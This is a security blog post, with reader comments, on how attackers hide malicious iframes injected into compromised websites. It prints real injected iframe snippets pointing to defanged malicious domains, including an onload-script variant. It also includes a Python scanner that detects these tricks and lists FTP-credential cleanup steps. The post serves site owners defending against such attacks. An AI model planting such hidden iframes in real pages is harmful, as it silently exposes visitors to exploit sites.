
Evolution of Hidden Iframes

   28 Oct 09   Filed in Website exploits

Injecting hidden malicious iframes into compromised legitimate websites is one of the most popular types of malware attacks. Invisible iframes allow exploits to be loaded silently from “bad” sites while unsuspecting web surfers browse the visible content of infected websites.

Iframes are rectangular elements of web pages in which you can load other web pages, either from the same site or from some third-party site (in other words: a web page inside a web page). There are many legitimate uses of iframes. The most common is ad blocks (e.g. Google displays AdSense in iframes).

Hiding iframes

I said that iframes are rectangular elements and that they occupy some space on web pages. So how do hackers make them invisible?

Dimension tricks

The easiest trick is to create an iframe with zero-length sides (Warning: in the examples I use real code that I found on different infected websites):

<iframe src="hxxp://google-analyz .cn/ count.php?o=1" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

When malware scanners started to search for iframes with zeros in both width and height, hackers started to use zero in one dimension only (the area of a rectangle with zero width or zero height is still zero – nothing to display).

<iframe src="hxxp://a86x .homeunix .org:8080/ ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>

Then, to game scanners that searched for zeros, hackers started to use barely visible iframes. If an iframe occupies only a few pixels on screen, it looks like a dot that is hard to spot, especially if it is located at the very top or bottom of an infected web page.

<iframe src="hxxp://yourlitetop .cn/ ts/ in.cgi?mozila7" width=2 height=4 style="visibility: hidden"></iframe>

Invisible styles

Another trick is to use the “visibility: hidden” style. With this style, it doesn’t matter what the dimensions of an iframe are – it won’t be displayed by a web browser (but its content will still be loaded).

<iframe src="hxxp://combinebet .cn:8080/ index.php" width=180 height=141 style="visibility: hidden"></iframe>

Usually this style is combined with dimension tricks. I guess some browsers may not support this style for iframes. Or hackers are just afraid of being unmasked if CSS is disabled (which is quite rare nowadays).

About a month ago, hackers started to use iframes that contained absolutely no code making them invisible. Still, they wouldn’t display in web browsers. The trick was to place a visible iframe inside an invisible div.

<div style="display:none"><iframe src="hxxp://red-wolf .ru:8080/ index.php" width=574 height=455 ></iframe></div>

New JavaScript onload trick

If you follow me on Twitter, you already know that hackers now use a brand new trick to hide their iframes. What they do is inject iframes that lack both the src parameter that tells where to load a page from and any dimension or style parameters that could make the iframes invisible.

This time they solely rely on a script specified for the “onload” event of iframes:

<iframe frameborder="0" onload="if (!this.src){ this.src='hxxp://iqmon .ru:8080/ index.php'; this.height='0'; this.width='0';}" >dvexgqoexlsvajdiodgqvxswnifzmxo</iframe>

As you can see, the onload script assigns values to the iframe’s src, height and width on the fly when someone loads an infected web page. The iframe is initially blank. Then it executes the script and makes itself hidden, loading a malicious page at the same time. As a side effect, you may notice a flicker when you load an infected web page.

This way hackers try to keep their iframes unnoticed by scanners that search for either hidden iframes or iframes from untrusted sources.
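As an added example (my own code, not the Unmask Parasites scanner), here is a small Python scanner that flags the hiding tricks reviewed above: zero or tiny dimensions, hiding styles, a display:none ancestor, and a src-less iframe whose onload script sets src. The TINY_PX threshold and the constructed sample page with placeholder hosts are assumptions.

```python
# Added example, not Unmask Parasites' scanner; TINY_PX and SAMPLE are assumptions.
import re
from html.parser import HTMLParser
TINY_PX = 4  # width and height both at most this: "barely visible" iframe

def _px(value):  # leading integer of a width/height attribute, or None
    m = re.match(r"\s*(\d+)", value or "")
    return int(m.group(1)) if m else None

class HiddenIframeScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.stack = []      # (tag, uses display:none) for each open element
        self.findings = []   # (reason, src) for every suspicious iframe

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        style = re.sub(r"\s+", "", a.get("style", "").lower())
        self.stack.append((tag, "display:none" in style))
        if tag != "iframe":
            return
        w, h, src = _px(a.get("width")), _px(a.get("height")), a.get("src", "")
        reasons = []
        if 0 in (w, h):
            reasons.append("zero width or height")
        elif w is not None and h is not None and w <= TINY_PX and h <= TINY_PX:
            reasons.append("barely visible size")
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden by style")
        if any(hidden for _, hidden in self.stack[:-1]):
            reasons.append("inside display:none ancestor")
        if not src and "src" in a.get("onload", ""):
            reasons.append("no src, set by onload script")
        self.findings.extend((r, src) for r in reasons)

    def handle_endtag(self, tag):
        while self.stack and self.stack.pop()[0] != tag:
            pass  # pop past unclosed elements until the matching open tag

def scan(html):
    parser = HiddenIframeScanner()
    parser.feed(html)
    return parser.findings

# Constructed sample: one iframe per trick plus an ad-sized one; placeholder hosts.
SAMPLE = """
<iframe src="http://example.invalid/a" width=0 height=0 frameborder=0></iframe>
<iframe src="http://example.invalid/b" width=2 height=4 style="visibility: hidden"></iframe>
<div style="display:none"><iframe src="http://example.invalid/c" width=574 height=455></iframe></div>
<iframe frameborder="0" onload="if (!this.src){ this.src='http://example.invalid/d'; this.height='0'; }">x</iframe>
<iframe src="http://example.invalid/ad" width=300 height=250></iframe>
"""
```

Running scan(SAMPLE) reports each of the four hidden iframes with its reason and leaves the ordinary ad-sized one alone.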

Unmask Parasites vs hidden iframes

I should proudly note that, at this point, my Unmask Parasites successfully detects all types of hidden iframes reviewed in this post.

Different tricks, the same attack

While all the iframes point to different domains and use different hiding techniques, 5 out of 6 examples in this post represent the same attack that I regularly review in this blog (you can find links at the bottom of this post).

Hackers steal FTP credentials from the computers of webmasters and then use them to inject malicious iframes into legitimate websites (mainly into files named index.html, home.html, default.html, etc. The extensions of infected files may also vary: .htm, .php, .asp, etc.).

Malicious domain names change every day and it’s hard to keep track of them. In this post I’ll try to list domains that I encounter in the latest “onload” modification of the iframe attack.


Removing hidden iframes

  1. Remove malware that steals FTP credentials. Thoroughly scan your computers for viruses and spyware.
  2. Once your computer is clean, change all site passwords to prevent reinfection.
  3. Keep new passwords secure. Don’t save them in FTP programs – this is exactly where the malware steals credentials from.
  4. Upload clean files (from a backup) to your site.
  5. If possible, don’t use the insecure FTP protocol. Most hosting plans offer secure protocols such as SFTP and FTPS.

Have your say

Do you have anything to add? Did I miss any trick that hackers use to hide iframes?

Your comments are always welcome!

Reader's Comments (12)

  1. |

    [...] This post was mentioned on Twitter by Denis, Malware Domain List. Malware Domain List said: RT @unmaskparasites [blog] Evolution of Hidden Iframes http://bit.ly/4q4Nab – tricks hackers use to hide malicious iframes [...]

  2. |

    I just today ran into an infected mootools.js that had obfuscated JavaScript that wrote – what else – an iframe into the document. The destination exploited the browser and then it was off to the races.

    • |

      I’ve removed the link from your code since the script is really malicious.

      Dave,

      Malicious scripts that inject hidden iframes is a whole new story. Much longer story than this one…

  3. |

    I’m sure in your research you also see many different ways of obfuscating iframes as well.

    Care to show some of those methods?

    • |

      Thomas,

      These are probably all main tricks for hiding existing iframes.

      On the other hand, there are so many ways to inject hidden iframes on the fly using scripts, that one could write a book about it.

  4. |

    [...] ———- The evolution of iframe injection: Evolution of Hidden Iframes. A commonly used way of hiding an iframe is <iframe src="hxxp://gumblar .cn/ [...]

  5. |

    “Malwarebytes’ Anti-Malware”

    People, this software is very nice for protecting your computer!

    Bye!

  6. |

    I didn’t know that I was infected mootools, is tha
    obfuscated JavaScript, but there was an iframe in the document and the destination was exploited.

  7. |

    Are you saying that google analystics is a hacker? What do you mean?

    • |

      “google analystics” is definitely malicious. Every domain that mimics Google Analytics is at least suspicious.

  8. |

    I want you to contact me because this does not make sense. How could someone hack with iframes?